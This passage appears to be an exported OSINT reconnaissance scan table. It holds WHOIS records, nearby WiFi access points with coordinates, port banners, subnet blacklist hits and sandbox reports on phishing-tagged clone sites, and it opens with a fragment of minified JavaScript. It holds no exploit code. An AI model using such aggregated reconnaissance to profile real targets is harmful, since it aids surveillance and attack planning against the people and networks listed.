0===u?"":u,y=["p",0,37],2)],f)[29](y[2],e[y[1]],e[1])+u),z.u).set(y[0],w),wx.y()).get(),z.u.set("k",v[7](16,e[2],r)),z&&z.u.set("id",z),z).tostring()},u).prototype.h1=function(){},u.prototype.ia=function(w,z){(((this.su[(z=["qu",30,"sq"],z)[0]](w),this).mx[z[0]](w),this).rr[z[0]](w),this)[z[2]][z[0]](w),this.bi[z[0]](w),v[z[1]](9," [Source: recaptcha__en_1_.js]\n Observed email domain:"z,u){(this[(((((td.prototype.sw[z=["undo-button-holder","image-button-holder","verify-button-holder"],u=["call",1,"sq"],u[0]](this,w),this.su).render(c[41](68,this,"reload-button-holder")),this.mx.render(c[41](52,this,"audio-button-holder")),this.rr).render(c[41](53,this,z[u[1]])),this.bi).render(c[41](84,this,"help-button-holder")),this.xv).render(c[41](68,this,z[0])),f[13](8,!1,this.xv.g()),u)[2]].render(c[41](68,this,z[2])),this).ee?f[13](22,!1,this.mx.g()):f[13](20,!1,this.rr.g())},u).prototype.nu=" [S |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | cHEEZburger (Category: hobby)
https://profile.cheezburger.com/login | login |
| 2023-05-12 03:24:22 | HTTP Status Code | No | Web Spider | 0 | 2 | 2 | 0 | None | 404 | https://kekw.battleb0t.xyz/jar |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | RPOWER3 (Net ID: 00:02:6F:B3:3B:AA) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:31:33 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | 4f516d38c2f942669e9c1663e414ae75.protect@withheldforprivacy.com | Domain Name: ASHU.XYZ
Registry Domain ID: D279374777-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://namecheap.com
Updated Date: 2023-03-28T08:17:54.0Z
Creation Date: 2022-03-03T09:34:10.0Z
Registry Expiry Date: 2024-03-03T23:59:59.0Z
Registrar: Namecheap
Registrar IANA ID: 1068
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant State/Province: Capital Region
Registrant Country: IS
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: GRACE.NS.CLOUDFLARE.COM
Name Server: LOGAN.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:37.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: ashu.xyz
Registry Domain ID: D279374777-CNIC
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-02-22T23:31:01.00Z
Creation Date: 2022-03-03T09:34:10.00Z
Registrar Registration Expiration Date: 2024-03-03T23:59:59.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 4f516d38c2f942669e9c1663e414ae75.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 4f516d38c2f942669e9c1663e414ae75.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 4f516d38c2f942669e9c1663e414ae75.protect@withheldforprivacy.com
Name Server: grace.ns.cloudflare.com
Name Server: logan.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T07:17:37.40Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:09:04 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.107 | 87.248.157.102 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SEC_LinkShare_693068 (Net ID: 00:12:FB:E0:05:F2) | 50.8897, 6.0563 |
| 2023-05-12 02:54:13 | Open TCP Port Banner | No | Censys | 0 | 0 | 4 | 0 | None | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 253
Connection: close
CF-RAY: -
| 2606:4700:3030::ac43:a8fc |
| 2023-05-12 02:52:48 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 26, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://optisigns.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:6044:304:WilStaging_02"\n "SM0:6044:120:WilError_01"\n "Local\\SM0:6044:120:WilError_01"\n "SM0:6044:304:WilStaging_02"\n "InternetShortcutMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"75.2.70.75:80"\n "138.91.254.96:443"\n "75.2.70.75:443"\n "52.25.204.60:443"\n "65.8.158.16:443"\n "142.250.191.42:443"\n "172.64.132.15:443"\n "185.199.108.153:443"\n "151.101.1.229:443"\n "104.19.255.88:443"\n "69.16.175.42:443"\n "65.8.165.144:443"\n "104.17.24.14:443"\n "142.250.191.35:443"\n "142.251.46.234:443"\n "157.230.203.149:443"\n "65.8.158.126:443"\n "169.150.221.147:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"optisigns.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"a.omappapi.com"\n "a.opmnstr.com"\n "ajax.googleapis.com"\n "alb.reddit.com"\n "api.edgeoffer.microsoft.com"\n "api.omappapi.com"\n "app.clearbit.com"\n "app.termly.io"\n "assets-tracking.crazyegg.com"\n "cdn.jetboost.io"\n "cdn.jsdelivr.net"\n "cdn.linkedin.oribi.io"\n "cdnjs.cloudflare.com"\n "code.jquery.com"\n "connect.facebook.net"\n "customerioforms.com"\n "d3e54v103j8qbb.cloudfront.net"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "forms.hscollectedforms.net"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "src="https://www.facebook.com/tr?id=1046181442239428&ev=PageView&noscript=1"" (Indicator: "dir "; File: "urlref_httpoptisigns.com")\n Found string ""url": "https://www.youtube.com/watch?v=Qan_OvBeUpc"," (Indicator: "dir "; File: "urlref_httpoptisigns.com")\n Found string ""originalUrl": "https://www.youtube.com/watch?v=Qan_OvBeUpc"," (Indicator: "dir "; File: "urlref_httpoptisigns.com")\n file/memory contains long string with (Indicator: "dir "; File: "urlref_httpoptisigns.com")\n Found string ""url": "https://www.youtube.com/watch?v=oa2hb64HdfY"," (Indicator: "dir "; File: "urlref_httpoptisigns.com")\n Found string ""originalUrl": "https://www.youtube.com/watch?v=oa2hb64HdfY"," (Indicator: "dir "; File: "urlref_httpoptisigns.com")\n Found string ""url": "https://www.youtube.com/watch?v=HsxOzOtdJEU"," (Indicator: "dir "; File: "urlref_httpoptisigns.com")\n Found string ""originalUrl": "https://www.youtube.com/watch?v=HsxOzOtdJEU"," (Indicator: "dir "; File: "urlref_httpoptisigns.com")\n Found string "</svg></div></a><a href="https://twitter.com/OptiSignsInc" target="_blank" class="w-inline-block"><div class="social-icon w-embed"><svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">" (Indicator: "dir "; File: "urlref_httpoptisigns.com")\n Found string "www.facebook.com" (Indicator: "dir "; File: "PCAP")\n Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file "\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn tokens-journal"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\edgecoupons\\coupons_data.db\\log"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\autofill\\3.0.0.3\\manifest.json"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\edge kids mode\\0.0.0.10\\manifest.json"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\edge kids mode\\0.0.0.10\\manifest.fingerprint"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\eadpdata component\\4.0.2.16\\manifest.json"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\eadpdata component\\4.0.2.16\\manifest.fingerprint"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\autofill\\3.0.0.3\\manifest.fingerprint"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\extension state\\current"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\extension state\\manifest-000001"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\extension state\\000003.log"\n "msedge.exe" reads file "\\device\\namedpipe\\local\\mojo.3784.704.8066580413151223232"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpoptisigns.com" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00003784]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00007716]\n "Ruleset Data" has type "data"- [targetUID: 00000000-00003784]\n "wallet-pre-stabl | 185.199.108.153 |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.233): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:01:F4:5B:7B:F7) | 34.0544, -118.244 |
| 2023-05-12 02:48:26 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://1inchh.github.io/', u'signatures': [{u'category': u'General', u'origin': u'Loaded Module', u'identifier': u'module-11', u'name': u'Loaded modules', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 0, u'threat_level': 0, u'type': 10, u'description': u'"iexplore.exe" loaded module "%WINDIR%\\System32\\ole32.dll" at 750C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\oleaut32.dll" at 75BE0000\n "iexplore.exe" loaded module "%WINDIR%\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\\comctl32.dll" at 73C00000\n "iexplore.exe" loaded module "%WINDIR%\\WindowsShell.Manifest" at 00430000\n "iexplore.exe" loaded module "%PROGRAMFILES%\\Internet Explorer\\IEShims.dll" at 69090000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dwmapi.dll" at 739A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\winhttp.dll" at 70440000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\clbcatq.dll" at 75E50000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\cryptsp.dll" at 74790000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rsaenh.dll" at 004F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rsaenh.dll" at 74520000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\RpcRtRemote.dll" at 74D20000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\npmproxy.dll" at 6E1A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\FWPUCLNT.DLL" at 72C70000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\crypt32.dll" at 74EF0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msasn1.dll" at 74DA0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\en-US\\user32.dll.mui" at 01E90000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\setupapi.dll" at 75CB0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\cfgmgr32.dll" at 75020000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\devobj.dll" at 74ED0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\mscoree.dll" at 690F0000\n "iexplore.exe" loaded module "%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" at 671A0000\n "iexplore.exe" loaded module "%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" at 66430000\n "iexplore.exe" loaded module "%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" at 65E80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\sxs.dll" at 74C90000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\en-US\\KernelBase.dll.mui" at 035B0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\credssp.dll" at 74450000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ncrypt.dll" at 748C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\bcrypt.dll" at 748A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\bcryptprimitives.dll" at 74460000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wintrust.dll" at 74E40000\n "iexplore.exe" loaded module "%LOCALAPPDATA%\\ow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" at 037F0000\n "iexplore.exe" loaded module "%PROGRAMFILES%\\Internet Explorer\\iexplore.exe" at 043A0000\n "iexplore.exe" loaded module "%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" at 65790000\n "iexplore.exe" loaded module "%WINDIR%\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" at 651E0000\n "iexplore.exe" loaded module "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Caches\\cversions.2.db" at 021D0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\kernel32.dll" at 759C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\KernelBase.dll" at 75050000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msvcrt.dll" at 76030000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-advapi32-l1-1-0.dll" at 74EA0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\advapi32.dll" at 75EE0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\sechost.dll" at 77020000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rpcrt4.dll" at 754D0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\iertutil.dll" at 75580000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-version-l1-1-0.dll" at 750A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\version.dll" at 74300000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-user32-l1-1-0.dll" at 74E90000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\user32.dll" at 757C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\gdi32.dll" at 75970000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\lpk.dll" at 77060000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\usp10.dll" at 75F90000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-normaliz-l1-1-0.dll" at 750B0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\normaliz.dll" at 77010000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-shlwapi-l1-1-0.dll" at 74E80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\shlwapi.dll" at 77070000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\imm32.dll" at 000E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\imm32.dll" at 77040000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msctf.dll" at 75AF0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\cryptbase.dll" at 74C80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ws2_32.dll" at 76FD0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\nsi.dll" at 75BD0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\fltLib.dll" at 6FF60000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-core-synch-l1-2-0.dll" at 72500000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\sspicli.dll" at 74C10000\n "iexplore.exe" loaded module "%WINDIR%\\Globalization\\Sorting\\SortDefault.nls" at 01EF0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-shell32-l1-1-0.dll" at 71E80000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\shell32.dll" at 76230000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ieframe.dll" at 6C860000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\comdlg32.dll" at 75890000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\uxtheme.dll" at 737C0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\urlmon.dll" at 760E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-ole32-l1-1-0.dll" at 74E70000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wininet.dll" at 75220000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\profapi.dll" at 74D90000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\userenv.dll" at 74EB0000\n "iexplore.exe" loaded module "%PROGRAMFILES%\\Internet Explorer\\sqmapi.dll" at 72540000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\secur32.dll" at 74AC0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-advapi32-l2-1-0.dll" at 71580000\n "iexplore.exe" loaded module "%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat" at 00460000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\webio.dll" at 703F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\mswsock.dll" at 74750000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\api-ms-win-downlevel-shlwapi-l2-1-0.dll" at 68E00000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wship6.dll" at 74740000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\IPHLPAPI.DLL" at 742E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\winnsi.dll" at 742D0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\netprofm.dll" at 6E7E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\nlaapi.dll" at 72F70000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\netapi32.dll" at 732F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\netutils.dll" at 732E0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\srvcli.dll" at 749A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\wkscli.dll" at 732D0000\n "iexplore.exe" loaded module "%PROGRAMFILES%\\Internet Explorer\\ieproxy.dll" at 69220000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\WSHTCPIP.DLL" at 741F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dnsapi.dll" at 74610000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\rasadhlp.dll" at 715A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\apphelp.dll" at 74C30000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ieui.dll" at 69010000\n "iexplore.exe" loaded module "%WINDIR%\\Fonts\\StaticCache.dat" at 038A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\WindowsCodecs.dll" at 733F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\oleacc.dll" at 71740000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\oleaccrc.dll" at 02830000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ExplorerFrame.dll" at 70830000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\duser.dll" at 73A10000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dui70.dll" at 73560000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\msimg32.dll" at 72640000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\en-US\\msctf.dll.mui" at 037D0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dhcpcsvc6.dll" at 72C40000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\dhcpcsvc.dll" at 74200000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\mlang.dll" at 691F0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\propsys.dll" at 73AC0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\ntmarta.dll" at 742A0000\n "iexplore.exe" loaded module "%WINDIR%\\System32\\Wldap32.dll" at 75AA0000\n "iexplore.exe" loaded module "%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000030.db" at 03840000\n "iexplore.exe | 185.199.110.153 |
| 2023-05-12 02:45:39 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://klliii.github.io/clone-netflix/', u'type': u'submitted', u'verdict': u'suspicious'}, {u'url': u'http://klliii.github.io/clone-netflix', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://klliii.github.io/clone-netflix/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': 